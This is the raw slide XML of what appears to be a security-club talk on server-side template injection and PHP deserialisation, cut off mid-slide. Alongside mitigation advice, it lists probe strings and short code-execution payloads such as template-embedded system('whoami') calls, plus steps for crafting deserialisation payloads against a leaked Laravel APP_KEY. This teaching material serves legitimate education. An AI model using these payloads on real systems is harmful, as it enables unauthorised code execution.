              <a:t>+ “}}&lt;/h1&gt;”)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Our malicious payload is directly executed rather than being interpreted as data</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40100" y="95700"/>
            <a:ext cx="82638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Server-Side Template Injection (SSTI)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="39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Steps to Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify the Injection Point</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Fuzz for errors: Inject the polyglot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${{&lt;%[%'"}}%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, look for errors in the response</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Make sure it’s SSTI, not XSS: try mathematical operations like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7+7}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>as the payload</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Try and identify how your code is being injected: Is it concatenated between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{ }} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>tags? Do you need to add them?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify the Templating Language: try a sequence of payload syntaxes like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${7*7}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%= 7/0 %&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>More details are here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identify</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Exploit! Payload syntax will depend on your language</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Extract variables like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{data.username}}</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Execute code with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%= system("whoami") %&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{% import os %}{{os.system('whoami')}}</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigating the Exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Create a template to render the user data, rather than concatenating it!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Pass user data as a parameter to a render call: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>render(title_template, title=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Then handle it as raw data inside the template: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;h1&gt;Title: {{user_data}}&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>We still control the parameter, but it’s no longer being treated as code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Note: syntax will vary per templating language</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Doctor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Demo!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="Google Shape;142;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1328438" y="852600"/>
            <a:ext cx="6487124" cy="4110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311700" y="1152475"/>
            <a:ext cx="8757000" cy="38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What is Serialisation?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>A way of programming languages storing objects so they can be reconstructed (deserialised) later</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Many languages do this, including Java and PHP - a common web scripting language!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP Serialisation</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP serialises objects like so: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>O:6:“Object”:1:{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:“var”;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:5:“value”;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>The syntax is: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>OBJ_TYPE:NAME_LENGTH:NAME:NUM_VARIABLES:{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name_type:name_length:name;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value_type:value_length:value;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>The Vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Some programs can introduce deserialisation vulnerabilities if they deserialise untrusted data</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Certain methods are called when an object is deserialised - in PHP, these are called ‘magic methods’, and include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__wakeup()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__unserialize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__destruct()</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>You can find a full list here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.php.net/manual/en/language.oop5.magic.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p2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Deserialisation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311700" y="923875"/>
            <a:ext cx="8520600" cy="42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Exploiting Deserialisation</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Finding a vulnerable function</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Site source code? Find it in backup files, .git folders etc</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>call and the corresponding class</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify vulnerable methods (e.g. __destruct, __wakeup) within the code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Crafting a payload</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Generate serialised object, setting variables as needed</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Trigger the exploit by passing your object</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Time for a demo!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>What went wrong with Academy?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The Laravel Framework stores users as a serialised object when managing sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>It includes an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> call when decoding a user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-XSRF-TOKEN</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>If we can create a valid token (using the leaked APP_KEY), we can cause Laravel to unserialise a custom-written object</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The payload itself is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, which won’t fit in these slides...</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>This pair of posts explains it very well! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://0xdf.gitlab.io/2021/02/27/htb-academy.html#shell-manually</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
